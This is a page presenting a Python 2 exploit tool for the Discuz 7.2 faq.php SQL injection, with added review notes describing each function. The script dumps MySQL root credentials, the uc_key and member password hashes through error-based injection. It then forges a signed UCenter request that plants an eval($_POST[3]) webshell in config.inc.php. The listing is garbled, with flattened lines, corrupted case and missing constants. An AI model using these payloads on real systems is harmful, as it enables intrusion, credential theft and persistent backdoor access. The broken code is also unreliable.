Discuz 7.2 faq.php fully automated exploit tool (Python): error-based SQL injection to dump data, followed by a uc_key-based getshell. The uc_key getshell portion is adapted from code found online (thanks to the original author).
Implementation code:
# Review notes (added): the listing below is a Python 2 exploit script ("except Exception, E",
# urllib2, print statements, xrange) whose newlines and indentation were lost on extraction and
# whose identifier case was randomly altered (Hashlib, Urllib, Len, Exit, Range ...).  It does
# not run as-is; these notes describe what it contains, they do not repair it.  The shebang and
# the three conflicting "coding:" declarations were originally separate lines.
#
# Target: Discuz 7.x faq.php, action=grouppermission, using the gids[99] / gids[100][0]
# parameters to break out of the SQL statement.  Every query function uses the same error-based
# extraction primitive: a subquery of the form
#     select count(*), concat(<value>, floor(rand(0)*2)) x from information_schema.tables group by x
# followed by re.findall("Duplicate entry '(.*?)'") over the response body to read <value> back
# out of the MySQL error text (the trailing floor() digit is stripped with [:-1]).  The multiplier
# after "rand(0) *" survives only in dumpdata ("* 2"); elsewhere it shows as "*)" and the regex
# quotes/spaces are garbled.  Extra/missing brackets such as "gids[99 " and "gids[100][0 '" are
# also extraction artifacts.
#
# Functions, in order:
#   sendrequest(url, para)   POSTs urlencoded para with a 20 s timeout; any exception prints
#                            "Exploit failed!" plus the error and exit(0)s the whole tool.
#   gettableprefix(url)      reads the first table name from INFORMATION_SCHEMA.TABLES for the
#                            current database (hex-encoded, .decode('hex')) and keeps the text
#                            before the first '_' as the Discuz table prefix.
#   getcurrentuser(url)      reads user().
#   getuckey(url)            reads authkey from cdb_uc_applications in two pieces
#                            (substr 1,62 and substr 63,2 -> the 64-char uc_key), presumably
#                            because the Duplicate-entry message truncates longer values.
#                            NOTE: the table name hard-codes the cdb_ prefix instead of using the
#                            value gettableprefix() discovers, so this step fails on installs with
#                            a different prefix.  The first payload ends in "a #" while every
#                            other payload ends in "a) #" -- likely an extraction artifact, verify.
#   getrootuser(url)         reads user/password from mysql.user; main only calls it when
#                            user() starts with 'root@'.
#   dumpdata(url, table_prefix, count)
#                            reads username/password row number `count` from <prefix>_members.
#   microtime() / get_authcode(string, key)
#                            Python port of UCenter's authcode() encryption: MD5-derived
#                            keya/keyb/keyc, an RC4-style key schedule (256-entry box, swap loop)
#                            and XOR keystream over '0000000000' + md5(string+keyb)[0:16] + string;
#                            returns the 4-char keyc + base64 output with '=' stripped.  Several
#                            256 constants are missing from this copy ("box = Range (0, 0)",
#                            "for I in range :", "(A + 1)%", "(j + box[a])%").
#   get_shell(url, key, host)
#                            signs "time=<now+10h>&action=updateapps" with the uc_key and POSTs an
#                            XML body to api/uc.php?code=...; the XML item contents (the lines
#                            starting with http://xxx and http://aaa) are truncated here.  The
#                            first body carries a quote breakout plus eval($_POST[3]) so the
#                            regenerated config.inc.php becomes a PHP backdoor; the second request
#                            appears to restore a benign app entry.  The tool then GETs
#                            host/config.inc.php and prints the backdoor "password" 3.  The
#                            +10*3600 added to the timestamp is presumably a clock-skew fudge --
#                            confirm against UCenter's time check.  The bare "except:" blocks
#                            return "Exploit falied"/"error" strings that main discards, so a
#                            failed upload produces no output at all.
#   __main__                 argv[1] = base URL, argv[2] = number of member rows to dump.
#                            The usage string only shows one argument; it should read
#                            "usage: python dz7.py http://target <count>".
#
# Operational caveats: this tool modifies the target (it writes a PHP backdoor into
# config.inc.php), and that backdoor is usable by anyone who knows the POST key "3"; run it only
# with explicit authorization and remove the backdoor afterwards.  Every failure path is a
# broad/bare except that prints a generic message with no indication of which step failed.
#!/usr/bin/env python# -*- coding: gbk -*-# -*- coding: gb2312 -*-# -*- coding: utf_8 -*- # author iswin import sysimport Hashlibimport timeimport mathimport base64import urllib2 import urllibimport redef sendrequest (url,para): Try:data = Urllib.urlencode (para) req=urllib2. Request (Url,data) Res=urllib2.urlopen (req,timeout=20). Read () except Exception, E:print ' Exploit failed!\n%s '% (e) exit (0); return resdef gettableprefix (URL):p rint ' Start gettableprefix ... ' para={' action ': ' Grouppermission ', ' gids[99 ': ' \ ', ' gids[100][0] ': ') and (select 1 from (SELECT COUNT (*), concat (select HEX (table_name) from INFORMATION_SCHEMA. TABLES where table_schema=database () limit 0,1), floor (rand (0) *) x from Information_schema.tables Group by X) a) # '}res= SendRequest (Url,para);p re=re.findall ("Duplicate entry ' (. *?) '", res); If Len (pre) ==0:print ' Exploit failed! ' Exit (0); Table_pre=pre[0][:len (Pre[0]) -1].decode (' hex ') table_pre=table_pre[0:table_pre.index ('_')]print ' Table_ pre:%s '% (table_pre) return table_predef Getcurrentuser(URL):p ara={' action ': ' Grouppermission ', ' gids[99] ': ' \ ', ' gids[100][0] ': ') and (select 1 from (SELECT COUNT (*), concat ( User (), Floor (rand (0) *) x from Information_schema.tables Group by X) a) # '}res=sendrequest (Url,para) Pre=re.findall (" Duplicate entry ' (. *?) ' ", res) if Len (pre) ==0:print ' Exploit failed! 
' Exit (0); Table_pre=pre[0][:len (pre[0]) -1]print ' current user:%s '% (table_pre) return table_predef getuckey (URL):p ara= {' Action ': ' Grouppermission ', ' gids[99] ': ' \ ', ' gids[100][0] ': ') and (select 1 from (SELECT COUNT (*), concat ((select SUBSTR (authkey,1,62) from cdb_uc_applications limit 0,1), floor (rand (0) *)) x from Information_schema.tables Group by X) a # '}para1={' action ': ' Grouppermission ', ' gids[99] ': ' \ ', ' gids[100][0] ': ') and (select 1 from (SELECT COUNT (*), concat (( Select substr (authkey,63,2) from cdb_uc_applications limit 0,1), floor (rand (0) *)) x from Information_schema.tables Group by X) a) # '}res=sendrequest (Url,para); Res1=sendrequest (URL,PARA1); Key1=re.findall ("Duplicate entry ' (. *?) '", RES) Key2=re.finDall ("Duplicate Entry" (. *?) ' ", res1) If Len (key1) ==0:print ' Get uc_key failed! ' Return ' Key=key1[0][:len (key1[0]) -1]+key2[0][:len (key2[0]) -1]print ' uc_key:%s '% (key) return keydef getrootuser (url :p ara={' action ': ' Grouppermission ', ' gids[99] ': ' \ ', ' gids[100][0] ': ') and (select 1 from (SELECT COUNT (*), concat (( Select Concat (User,0x20,password) from Mysql.user limit 0,1), floor (rand (0) *)) x from Information_schema.tables Group by x) a) # '}res=sendrequest (Url,para);p re=re.findall ("Duplicate entry ' (. *?) '", res) if Len (pre) ==0:print ' Exploit failed! ' Exit (0); Table_pre=pre[0][:len (Pre[0]) -1].split (") print ' root info:\nuser:%s password:%s '% (table_pre[0],table_pre [1]) def dumpdata (url,table_prefix,count):p ara={' action ': ' Grouppermission ', ' gids[99] ': ' \ ', ' gids[100][0 ' ': ') and ( Select 1 from (SELECT COUNT (*), concat ((select Concat (Username,0x20,password) from%s_members limit%d,1), Floor (rand (0) * 2) x from Information_schema.tables Group by X) a) # '% (table_prefix,count)}res=sendrequest (Url,para);d Atas=re.findaLL ("Duplicate entry" (. *?) ' ", res) if Len (datas) ==0:print ' Exploit failed! 
' Exit (0) Cleandata=datas[0][:len (datas[0]) -1]info=cleandata.split (") print ' user:%s pass:%s '% (info[0],info[1]) def Microtime (get_as_float = False): If Get_as_float:return time.time () Else:return '%.8f%d '% math.modf (time.time ()) def get_authcode (string, key = "): Ckey_length = 4 key = HASHLIB.MD5 (key). Hexdigest () Keya = HASHLIB.MD5 (Key[0:16] ). Hexdigest () keyb = HASHLIB.MD5 (key[16:32]). Hexdigest () Keyc = (Hashlib.md5 (Microtime ())). Hexdigest ()) [-ckey_length: ] Cryptkey = Keya + hashlib.md5 (KEYA+KEYC). Hexdigest () key_length = Len (cryptkey) string = ' 0000000000 ' + (hashlib.md5 (STRING+KEYB)). Hexdigest () [0:16]+string string_length = Len (string) result = "box = Range (0, 0) Rndkey = dict () for I in range : rndkey[i] = ord (cryptkey[i% key_length]) j=0 for I in Range (0,256): j = (j + box[i] + rndkey[i])% 256 TMP = Box[i] box[i] = box[j] box[j] = tmp a=0 j=0 for I in RanGE (0,string_length): a = (A + 1)% J = (j + box[a])% TMP = Box[a] box[a] = box[j] box[j] = tmp Result + = Chr (ord (String[i]) ^ (box[(Box[a] + box[j])) return KEYC + base64.b64encode (result). replace (' = ', ') de F Get_shell (Url,key,host): headers={' accept-language ': ' ZH-CN ', ' content-type ': ' application/x-www-form-urlencoded ' , ' user-agent ': ' Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1) ', ' Referer ': url} tm = Time.time () +10*3600 tm= "Time=%d&action=updateapps"%TM code = urllib.quote (Get_authco De (Tm,key)) url=url+ "? code=" +code data1= "" <?xml version= "1.0" encoding= "Iso-8859-1"?>
http://xxx\ '); eval ($_post[3]);//
"' Try:req=urllib2. Request (url,data=data1,headers=headers) ret=urllib2.urlopen (req) except:return "Exploit falied" data2= "<?xml Version= "1.0" encoding= "Iso-8859-1"?>
http://aaa
"' Try:req=urllib2. Request (url,data=data2,headers=headers) ret=urllib2.urlopen (req) except:return "error" try:req=urllib2. Request (host+ '/config.inc.php ') Res=urllib2.urlopen (req,timeout=20). Read () except Exception, E:print ' Getwebshell failed,%s '% (e) return print "Webshell:" +host+ "/config.inc.php,password:3" if __name__ = = ' __main__ ':p rint ' dz7.x Exp Cod E by Iswin ' If Len (sys.argv) <3:print ' dz7.x Exp Code by Iswin\nusage:python dz7.py http://www.bitsCN.com ' exit (0) Url= sys.argv[1]+ '/faq.php ' Count=int (sys.argv[2]) user=getcurrentuser (URL) if User.startswith (' root@ '): GetRootUser (URL ) Uc_key=getuckey (URL) If Len (uc_key) ==64:print ' Start Getwebshell ... ' Get_shell (sys.argv[1]+ '/api/uc.php ', Uc_key, SYS.ARGV[1]) tb_pre=gettableprefix (URL) print ' Start dumpdata ... ' for x in Xrange (0,count):d umpdata (url,tb_pre,x)